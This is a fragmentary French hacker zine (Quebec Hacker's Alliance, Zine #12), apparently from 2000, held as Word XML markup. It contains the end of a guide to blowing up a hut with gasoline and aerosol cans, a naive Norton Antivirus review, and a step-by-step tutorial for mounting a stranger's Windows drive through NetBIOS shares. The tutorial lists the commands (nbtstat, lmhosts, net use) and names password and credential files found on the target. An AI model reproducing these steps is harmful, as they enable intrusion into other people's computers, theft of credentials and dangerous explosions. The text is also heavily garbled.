avec un toit (top)</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a devrais avoir lair de s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us vyer le genre.....le top doit etre slack donc pas coul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deusieme étap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 l'artic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us placer les contenants vide dans les coin de votre tit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aison...vous i verser le gax a char que je vous ai parl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ous placer les canete aerosol un par dessus lautre mes qui</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e rentre pas dnas la parti creuse de votre top (l'intérieu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troisème étape de l'artic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us arroser le tout de gax ou de DIESEL chose qui n'étai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s inclu dans la liste de matérie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us arroser aussi lexterieur de votre maison donc ell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aigne ds le gaz...sa pu e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quatrième étap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 l'artic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us placer la camera a environ 10 metre de la cabane et vou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 faite filmer se qui va se pass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us alumer la cabane a lexterieur et vous vous en aller OPC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o plus criss) et vous vous planquer derriere un arbre ou un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grosse roche pi vous attender .....et un moment donner regard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n coup d,oeil si sa pogne en fe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i sa pogne replanquer vous et attender que sa sau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un coup que sa auras sauter ! si votre camera est po scrap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regarder le contenu de l'explosion au ralenti...</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ses DÉBILEZ en cris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ntk sa sétais ma version de house bomberz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obmanson QH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2.8 Norton Antiviru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obmanson QH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arlons de ce fameu anti viru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e Norton anti virus 5.0 exactement est selon moi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obmanson asser bien fais et ces celui que j'utilis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fin de ne pas me faire fouttre des sale viru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e anti virus doit se faire acheter car a ma connaisanc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ses pas lui le plus loader sur le net pour des program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évaluation ... se anti viruz se doit d'etre achet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i on lis sur la boite d'achat le programme anti virus norton 5.0</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 dit etre capable d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détection automatique des viru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élimination facile et rapide des virus avec l'assisatant réparatio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protege contre les virus'les chevauz de troie et le code ActiveX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ou les appels JAVA malveilla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répare a 100% les fichier infecter par des virus macro WorD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détection de 100% des virux connu actuellement en circulatio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mise en quarantaine, pour stocker les fichier infecter en tout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écurité</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Assistant"analyser et Transmetre" pour soumetre des fichier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suspect au centr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analyse de recherche de anti virus de symantec (SARC)</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ur analys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ssibiliter de programmer LiveUpdate pour récuper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tomatiquement les nouvell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éfinition des nouveau virus depuis le SARC</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amilioration de live update assurant des mises a jour plu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rapide et efficac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thecnologie bloodhound intégrer a la protection automatiq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ur trouver les nouvea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virus macro,de fichier et de zone amorc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définition amiliorer des virus ds les fichier compress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si vous vous demander ses quoi sa fait lorsque vous avez u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ti de viruz pi sa donne une image genre comme s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NORTON ANTI VIRUS 5.0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LE FICHIER C: BLABLA/GROS VIRUS/STUPIDE_DE_L'ACCEPET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EST CONTAMINER PAR LE VIRUS : /HAHAHA_JE_TAI_EU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DÉSIREZ VOUS :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SUPRIMER-REPARER-EXCLURE-METRE EN QUARANTAINE-CONTINUER-IGNOR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sa donne a peu pres sa mes lécran devient toute bleu .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ette version est concu pour tout les Windows que je connai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indows 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indows 98</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indows 95</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indows 3.1/DO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igniore malheuresement si cette anti virus fonctionne su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UNIX ou LINUX....</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 pis en passent : si vous voulez visiter le site web de la sourc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nformatio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 norton anti virus la voici:</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ww.symantec.com/region/reg.e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t de lassistance techiq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urope et anglai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ww.symnatec.com/region/reg.e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franc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ww.symantec.f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uiss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ww.symantec.com/region/ch</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avec norton  anti virus vous avez la liste de tout les virus qu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tre ordinateur pourrait etre infect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il en as environ 45000....fac....)</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e sais po si vous avez des question sur cette anti virus mes entk</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 ya as e mailer moi a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narchy_qha@hotmail.com</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2.9 Comment hacker un micro  |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:ind w:right="-1800" w:hanging="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>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qha Noobmanson </w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>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mment hacker un micro qui tourne sous win 95 / n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obmanson QHA le 7 janvier 2000</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Tout d'abord la victime doit avoir selectionner dans sa config</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eau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b/>
        <w:t>Client pour reseau Microsof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b/>
        <w:t>Partage des fichier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ou encore que le gars utilise Gamba sous linux(ben un newbi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qui installe linux)</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inon fuck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Donc comment se connecter ....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s win 95 Il faut cree le fichi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mhost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t hosts (ca c'est uniquement pour s'amuser par ftp ou telne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tructure du lmhost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umero ip                "nom du micro distant        "                         #P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omment arriver a voir l'ip du gar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en ca c'est facil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i le gars est ss irc , taper /dns sonnick</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si c'est un serveur ,moi j'utilise nslookup qui change le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ww.nnnd.fr en 193....</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y a aussi sous dos la commande ping -a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inon y a la moulinette (QHA is coo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us etes ss windows 95 ; ouvrir une fenetre DO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taper :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nbtstat -A ipdumec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TTENTION METTRE un GRAND A (taper nbstat -h pour plu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info)</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puis si ca marche bien ,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Changer dans le lmhosts et si vous voulez dans hosts numero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ip et nom</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taper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btstat -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pui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et view \\nomdelamachine (elle est donne ava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y a des ressources partage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i oui tap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et use * //nommachine/nomressourc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e dos vous dit que est nouveau lecteur vous est attribu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a soit vous taper x: (x = nom du nouveau lecteur) soit vou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llez ss wi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Sous NT pas besoin de changer le lmhosts ni host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xemple pour rentrer sur le micro de la victim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e suis sous mirc et y a un gros con qui fait chier tous le mond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on nick est: co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je tape /dns co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irc me dit 194.125.123.12</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 j'ouvre une fenetre dos et je tape nbstat -A 194.125.123.12</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a me di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etBIOS Remote Machine Name Tab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ame Type Statu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oupe&lt;00&gt; UNIQUE Registered</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kkkk &lt;00&gt; GROUP  Registered</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AC Address = 44-45-53-54-00-00</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onc je sais que je dois utiliser loupe ( because uniqu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edit mon fichier lmhosts et met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94.125.123.12     " loupe "   #P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 retour sous dos je tap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btstat -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t j'obtien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Successful purge and preload of the NBT Remote Cache Nam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Tab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uis net view \\loup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Ressources partagées à \\loup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m de partageType         Commentai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          Disq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        Disq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        Disq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xécution achevé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WINDOWS&gt;net use * \\loupe\c</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 connecté à \\loupe\c</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en voila vous etes sur le hd de la victim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on avec cette astuce faites pas de cochonneri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e prenez pas les pwl , user.dat , eudora.ini , kali.ini ,...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noobmanson QHA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2.10 Conclusion  |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:ind w:right="-1800" w:hanging="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>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726" w:hanging="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xml:space="preserve">____    __  __    __           ____   __  __   __    ______ ____ </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:ind w:right="-1726" w:hanging="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__/ __ \_ / / / /__/   |      ___/ __ \_/ / / /_ / /___/ ____//_  /</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:ind w:right="-1726" w:hanging="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xml:space="preserve">_  / / /_/ /_/ /__/ /| |      __/ /_/ /  / / /_ / / __/ /_   __/ / </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:ind w:right="-1726" w:hanging="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_/ /_/ __  / _/ ___ |      _/ _, _// /_/ / _/ /___/ /___  _/ /__</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:ind w:right="-1726" w:hanging="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___\_\/_/ /_/  /_/  |_|      /_/ |_| \____/  /_____/_____/  /____/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:ind w:right="-1726" w:hanging="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:ind w:right="-1726" w:hanging="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ind w:right="-1726" w:hanging="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">La conclusion est </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>GLOIRE AU Quebec Hacker's Alliance!!</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:ind w:right="-1726" w:hanging="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
        </w:rPr>
        <w:t>Merci d'avoir lu le</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Zine #12 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">des </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Quebec Hacker's Alliance</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:ind w:right="-1726" w:hanging="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">Le </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Zine #13</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> devrais suivre assez bientot! :) Garder un oeil</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:ind w:right="-1726" w:hanging="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
        </w:rPr>
        <w:t>sur nous pour plus de nouvelles... Allez sur #QHA (undernet)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:ind w:right="-1726" w:hanging="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
        </w:rPr>
        <w:t>ou sur www.qharulez.com comme vous preféré :) Merci!</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:ind w:right="-1726" w:hanging="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
        </w:rPr>
        <w:t>Au prochain mag!!!!!!!</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:ind w:right="-1726" w:hanging="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:ind w:right="-1726" w:hanging="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:ind w:right="-1726" w:hanging="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="180911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115" cy="1856740"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:ind w:right="-1726" w:hanging="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="800080"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="800080"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>PAT JE T'A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 w:name="Courier Ne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